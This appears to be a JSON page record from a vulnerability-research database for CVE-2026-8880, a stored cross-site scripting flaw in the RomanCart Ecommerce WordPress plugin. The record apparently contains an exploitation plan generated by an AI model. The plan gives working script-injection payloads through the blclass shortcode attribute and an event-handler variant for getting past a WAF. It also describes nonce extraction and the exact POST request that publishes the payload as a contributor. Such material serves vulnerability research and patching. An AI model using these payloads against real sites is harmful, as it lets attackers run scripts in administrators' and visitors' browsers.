[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTNhcL815i5tOFrF_SnaMkJ7Ob0KFVbPMYGj8ozNT3oY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-8880","romancart-ecommerce-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","RomanCart Ecommerce \u003C= 2.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The RomanCart Ecommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blclass' attribute (and other attributes) of the romancart_button shortcode in versions up to, and including, 2.0.8. This is due to insufficient input sanitization and output escaping on user supplied attributes within the romancart_button_shortcode() function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","romancart-ecommerce",null,"\u003C=2.0.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-08 15:06:45","2026-06-09 03:41:19",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5d44255b-0615-439d-b166-8f1100f53e3a?source=api-prod",[],"researched",false,3,"This exploitation research plan focuses on **CVE-2026-8880**, a Stored Cross-Site Scripting (XSS) vulnerability in the RomanCart Ecommerce plugin for WordPress.\n\n### 1. Vulnerability Summary\nThe `romancart_button` shortcode in the RomanCart Ecommerce plugin (versions \u003C= 2.0.8) is vulnerable to Stored XSS. The vulnerability exists within the `romancart_button_shortcode()` function, which fails to sanitize or escape user-supplied attributes—specifically the `blclass` attribute—before reflecting them in the HTML output of a post or page. Since Contributors can create and edit posts containing shortcodes, they can inject malicious scripts that execute in the context of any user (including administrators) who views the affected page.\n\n### 2. Attack Vector Analysis\n*   **Authentication Level:** Authenticated (Contributor or higher).\n*   **Injection Point:** Post\u002FPage content via the WordPress Editor (Gutenberg or Classic).\n*   **Vulnerable Component:** Shortcode `[romancart_button]`.\n*   **Vulnerable Parameter:** `blclass` attribute.\n*   **Preconditions:** The plugin must be active, and the attacker must have permissions to save a post (Draft or Published).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode during the `init` hook:\n    `add_shortcode('romancart_button', 'romancart_button_shortcode');`\n2.  **Shortcode Processing:** When a page containing the shortcode is rendered, `do_shortcode()` invokes the callback `romancart_button_shortcode($atts)`.\n3.  **Attribute Handling (Vulnerable Sink):** The function likely extracts attributes without applying `esc_attr()` or `sanitize_html_class()`.\n    *   *Inferred Logic:*\n        ```php\n        function romancart_button_shortcode($atts) {\n            $atts = shortcode_atts(array('blclass' => '', ...), $atts);\n            $class = $atts['blclass']; \u002F\u002F No sanitization\n            return '\u003Cbutton class=\"' . $class . '\">Buy Now\u003C\u002Fbutton>'; \u002F\u002F No escaping\n        }\n        ```\n4.  **Output:** The unescaped HTML is returned to the WordPress content filter and rendered in the user's browser.\n\n### 4. Nonce Acquisition Strategy\nTo exploit this stored XSS, the attacker must submit a post containing the malicious shortcode. This requires the standard WordPress post-editing nonce (`_wpnonce`).\n\n1.  **Navigate to Editor:** Use `browser_navigate` to access the \"New Post\" page: `\u002Fwp-admin\u002Fpost-new.php`.\n2.  **Identify Nonce:** The nonce is stored in a hidden input field with the ID `_wpnonce`.\n3.  **Extraction:**\n    *   Use `browser_eval` to retrieve the nonce:\n        ```javascript\n        browser_eval(\"document.querySelector('#_wpnonce').value\")\n        ```\n    *   For Gutenberg-based editors, the nonce may also be found in the `wpApiSettings` object:\n        ```javascript\n        browser_eval(\"window.wpApiSettings.nonce\")\n        ```\n4.  **Verification:** If the plugin uses a specific AJAX handler for shortcode previews, look for a localized variable (e.g., `romancart_vars.nonce`), though this is unnecessary for the primary storage vector.\n\n### 5. Exploitation Strategy\nThe goal is to store a shortcode attribute that breaks out of the HTML `class` attribute to inject a script.\n\n1.  **Authentication:** Login to the WordPress instance as a user with the `contributor` role.\n2.  **Acquire Nonce:** Follow the steps in Section 4 to obtain the `_wpnonce`.\n3.  **Prepare Payload:**\n    *   The payload uses a double-quote to close the `class` attribute, followed by an XSS vector.\n    *   *Payload:* `[romancart_button blclass='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n4.  **Submit Request:** Use the `http_request` tool to create a post.\n    *   **Method:** `POST`\n    *   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fpost.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body Parameters:**\n        *   `action`: `editpost`\n        *   `post_ID`: `\u003CID_FROM_POST_NEW_PAGE>`\n        *   `_wpnonce`: `\u003CEXTRACTED_NONCE>`\n        *   `post_title`: `Product Page`\n        *   `content`: `[romancart_button blclass='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n        *   `post_status`: `publish` (or `draft` for preview-based exploitation)\n5.  **Trigger Execution:** Navigate to the URL of the newly created post as an Administrator.\n\n### 6. Test Data Setup\n1.  **User Creation:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Installation:** Ensure RomanCart Ecommerce version 2.0.8 is installed and active.\n3.  **Target Page:** Identify the ID of a draft post created by the contributor for the `editpost` action.\n\n### 7. Expected Results\n*   **Stored State:** The `wp_posts` table will contain the literal shortcode string in the `post_content` column.\n*   **Rendered Output:** When viewing the page source, the following HTML will be present:\n    `\u003Cbutton class=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">Buy Now\u003C\u002Fbutton>`\n*   **Execution:** A JavaScript alert showing the site's domain will trigger upon page load.\n\n### 8. Verification Steps\n1.  **Database Check:**\n    `wp post get \u003CPOST_ID> --field=post_content`\n    Verify the shortcode and payload are stored.\n2.  **Frontend Inspection:**\n    Use `http_request` (GET) to the post's permalink and search for the `\u003Cscript>` tag in the response body.\n\n### 9. Alternative Approaches\n*   **Event Handler Injection:** If `\u003Cscript>` tags are filtered by a WAF, use an event handler:\n    `blclass='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;\"'`\n*   **Other Attributes:** The vulnerability description mentions \"other attributes.\" If `blclass` is patched, test parameters like `storeid`, `itemname`, or `price` for similar lack of escaping in the `romancart_button_shortcode()` function.\n*   **Classic Editor vs. Gutenberg:** If the block editor's REST API endpoint is used, the nonce and endpoint (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F\u003CID>`) will change, but the core vulnerability in the shortcode rendering remains the same.","gemini-3-flash-preview","2026-06-26 02:06:45","2026-06-26 02:07:57",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fromancart-ecommerce\u002Ftags"]